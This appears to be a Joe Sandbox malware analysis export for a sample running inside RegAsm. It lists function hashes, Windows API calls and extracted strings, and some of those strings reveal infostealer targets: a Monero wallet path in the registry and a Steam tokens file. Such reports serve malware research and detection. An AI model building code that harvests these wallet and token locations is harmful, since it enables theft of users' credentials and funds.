                                                                                                                                                                                                • Opcode Fuzzy Hash: 64f15566ddab25c787ed05cf10e2b1c50c44e9ad38fae7b2066188378aa964c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1631C3B6B083019BDB10CF68E980B9AB7E4FF84311F00497EEA45CB751E325E994C7A5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                                                                                                                                                • Instruction ID: 39adff561e135a3e28b5651de17c04dbfdc21ff9f074ca8e5310251314b0c130
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B319E75504B419ADB28CB25E9487DAB7E0FF95310F00C92DD9DAC2A00D371F48A87A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strtok_s$H_prolog
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1158113254-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 1B68F4E0
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 1B68F4ED
                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1B68F513
                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 1B68F539
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FilePointer$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 142388799-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3016257755-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcatlstrcpylstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 809291720-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3676486918-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042548E), ref: 0040EC35
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042548E), ref: 0040EC3C
                                                                                                                                                                                                • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042548E), ref: 0040EC48
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040EC73
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1243822799-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B691382
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1B69138E
                                                                                                                                                                                                • ___initconout.LIBCMT ref: 1B69139E
                                                                                                                                                                                                  • Part of subcall function 1B691303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1B6913A3), ref: 1B691316
                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B6913B3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3431868840-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                • API String ID: 0-2803948771
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!.15g$-
                                                                                                                                                                                                • API String ID: 0-583212262
                                                                                                                                                                                                • Opcode ID: 07a97ff848006e3dab731f84862afccc668262358852586e1223e179cb07614c
                                                                                                                                                                                                • Instruction ID: d56c6178534d7344d310f4719e8751e82afc014e203b54bf270e72b39646816c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 07a97ff848006e3dab731f84862afccc668262358852586e1223e179cb07614c
                                                                                                                                                                                                • Instruction Fuzzy Hash: ED918DB1A083458FD704DF6DD89179AFBE0EBC8304F04492DE899CB351E7B9D8098B92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                • API String ID: 0-2803948771
                                                                                                                                                                                                • Opcode ID: dc4f09d26705e071738a0829ca8d4ea090714c049dac605c26c6345461a354d0
                                                                                                                                                                                                • Instruction ID: 7506c984e18aec44e0128c00119d35c13f88dfca1b01f69e426a11c02c983b46
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc4f09d26705e071738a0829ca8d4ea090714c049dac605c26c6345461a354d0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D8112B5A043019BDB00CF18CC61BD6B7E5AFA8710F44891CFA8597393E375E9468B9A
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: *$?
                                                                                                                                                                                                • API String ID: 0-2367018687
                                                                                                                                                                                                • Opcode ID: 217e6c6a8ce3cf581d3df2e73733243f4d6cd2dc3efc3b6358d30090155183d5
                                                                                                                                                                                                • Instruction ID: 26ced7a6d5711804d1fb188a0c58e039648b0b74276a8f84b66c53b220db15b2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 217e6c6a8ce3cf581d3df2e73733243f4d6cd2dc3efc3b6358d30090155183d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48710670A083518FE7158F28C98079BBBE7FFC5210F48496DE8C587305D775EA458B92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • LIKE or GLOB pattern too complex, xrefs: 1B4AC94F
                                                                                                                                                                                                • ESCAPE expression must be a single character, xrefs: 1B4ACA43
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                • API String ID: 0-264706735
                                                                                                                                                                                                • Opcode ID: 0ca3b50f36aa830983f0d445e2947e43f9578784bc5d2d9aaba423c6b9362aaf
                                                                                                                                                                                                • Instruction ID: 5a678a69543715204cd79cced4e7c5c5d555fd17e5cd73af4c47512995e0f7dd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ca3b50f36aa830983f0d445e2947e43f9578784bc5d2d9aaba423c6b9362aaf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 86618875A082918FDB44CA34CC81BF677A5AB61324F24C28DE8A39F3D3D679C482C794
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                • API String ID: 0-2803948771
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B4A56D1
                                                                                                                                                                                                • winDelete, xrefs: 1B4A569C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                • API String ID: 0-1405699761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                • API String ID: 0-2803948771
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • sqlite_stat1, xrefs: 1B58DF30
                                                                                                                                                                                                • SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1B58DF4F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
                                                                                                                                                                                                • API String ID: 0-3572622772
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: OsError 0x%lx (%lu)
                                                                                                                                                                                                • API String ID: 0-3720535092
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1B4BF752
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
                                                                                                                                                                                                • API String ID: 0-2071071404
                                                                                                                                                                                                • Opcode ID: 8ba2f788058339da5149233e4f09278598022d733707fc26f3c6e112801f0840
                                                                                                                                                                                                • Instruction ID: 6007f285dd8650e4bb967c0cf2ebe8e356e1a40e83d35a5d54d246329abca6d9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ba2f788058339da5149233e4f09278598022d733707fc26f3c6e112801f0840
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D11A3B5600111AFE704AB69EDC9FEB73ACEBE4215F00456DFE89D2240E761E849C6B1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • GetXStateFeaturesMask, xrefs: 1B670E34
                                                                                                                                                                                                • InitializeCriticalSectionEx, xrefs: 1B670E84
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                                                                                                                                                                                • API String ID: 0-4196971266
                                                                                                                                                                                                • Opcode ID: 7f907ade5b71451b0b440bdb2c5d646a5dff998821ed12783629dd02e4e6aa0a
                                                                                                                                                                                                • Instruction ID: 8b59dcaee6d2c4d38c52062adf5d3a524514bb21ab27c3cd0bbb87c6dddb61cd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f907ade5b71451b0b440bdb2c5d646a5dff998821ed12783629dd02e4e6aa0a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B018FBA640228B7CB153B91CD05EDE7F26EBB87A2F054121FE5829250DA72986097E0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Xinvalid_argumentmemcpystd::_
                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                • API String ID: 1835169507-2556327735
                                                                                                                                                                                                • Opcode ID: 86d41fe763d4f9670a0bda7700db276dcec98eba4a10b3b688012156d81808ca
                                                                                                                                                                                                • Instruction ID: 5178b8b9bae27dddffe99f82d3cba96b452232b4c10b18376653ba913e323939
                                                                                                                                                                                                • Opcode Fuzzy Hash: 86d41fe763d4f9670a0bda7700db276dcec98eba4a10b3b688012156d81808ca
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF11B9317042109BDB309EADC84095AB7A9EF41758F10093FF556AB2C2C77A994A87DE
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040D0E2
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5A5
                                                                                                                                                                                                  • Part of subcall function 0041D590: __CxxThrowException@8.LIBCMT ref: 0041D5BA
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5CB
                                                                                                                                                                                                  • Part of subcall function 0040CED1: std::_Xinvalid_argument.LIBCPMT ref: 0040CEE2
                                                                                                                                                                                                • memcpy.MSVCRT ref: 0040D13D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • invalid string position, xrefs: 0040D0DD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                                                                                                                                • String ID: invalid string position
                                                                                                                                                                                                • API String ID: 214693668-1799206989
                                                                                                                                                                                                • Opcode ID: 6db7f21e639e4ee25f80c59323fcb4094b3614726ddfd8fc1b0f95dadf20a757
                                                                                                                                                                                                • Instruction ID: c288a1353cca4a63b317874bbee34a0bb446cbe3dd24b07f24b290e3641dc7f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6db7f21e639e4ee25f80c59323fcb4094b3614726ddfd8fc1b0f95dadf20a757
                                                                                                                                                                                                • Instruction Fuzzy Hash: F2110831B04210E7CF249E4D9C80A6AB3A5AF85714F20053FF856AB3C1CB79D849C79D
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,1B679AE5,1B6CD448,0000000C), ref: 1B679A24
                                                                                                                                                                                                • GetFileType.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,1B679AE5,1B6CD448,0000000C), ref: 1B679A36
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                • String ID: h/
                                                                                                                                                                                                • API String ID: 3000768030-3808599586
                                                                                                                                                                                                • Opcode ID: 3529f5cb3897e3c7c2f5cbfb7ffeeaa620604cd469bad3c292f2348ce8390871
                                                                                                                                                                                                • Instruction ID: 12aaab3a173a0499bbb6812f57699e3b74b8d3cd6462d426d13156506d224ff8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3529f5cb3897e3c7c2f5cbfb7ffeeaa620604cd469bad3c292f2348ce8390871
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C11E6B16057526ACB30AE3E8C886927AE9A7B7230B24071ED5F7C65F5C230D5C6C240
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                • API String ID: 0-1304234792
                                                                                                                                                                                                • Opcode ID: 14e52a4eb87aa0cc22f8b75683ca8f73af085c5906f7464b11e03d7fe1e3d6b5
                                                                                                                                                                                                • Instruction ID: 44eb496ad7df213b27335ae328a64d71a3da5cdbcfb027f5b483f7598c444497
                                                                                                                                                                                                • Opcode Fuzzy Hash: 14e52a4eb87aa0cc22f8b75683ca8f73af085c5906f7464b11e03d7fe1e3d6b5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 05112EB56083408FDB04DF19D45279FBBE4AFD8214F84882EE98A87391E774E548CB97
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • SELECT %s WHERE rowid = ?, xrefs: 1B4EF017
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: SELECT %s WHERE rowid = ?
                                                                                                                                                                                                • API String ID: 0-866778640
                                                                                                                                                                                                • Opcode ID: a856bf623b41e64853c86a1f6a9e95dcea2f5bce5205a789bbfe47c1f8629398
                                                                                                                                                                                                • Instruction ID: 9bc80c451fd129667c484212f11bc2901097b6c5949ed942c9648d3c06f62cbf
                                                                                                                                                                                                • Opcode Fuzzy Hash: a856bf623b41e64853c86a1f6a9e95dcea2f5bce5205a789bbfe47c1f8629398
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4111297120134A9BD7205F95EC40FD6F794EB40222F10852EF55596640E773B45197B0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00413558
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004254F3), ref: 004135A9
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Soft\Steam\steam_tokens.txt, xrefs: 004135C1
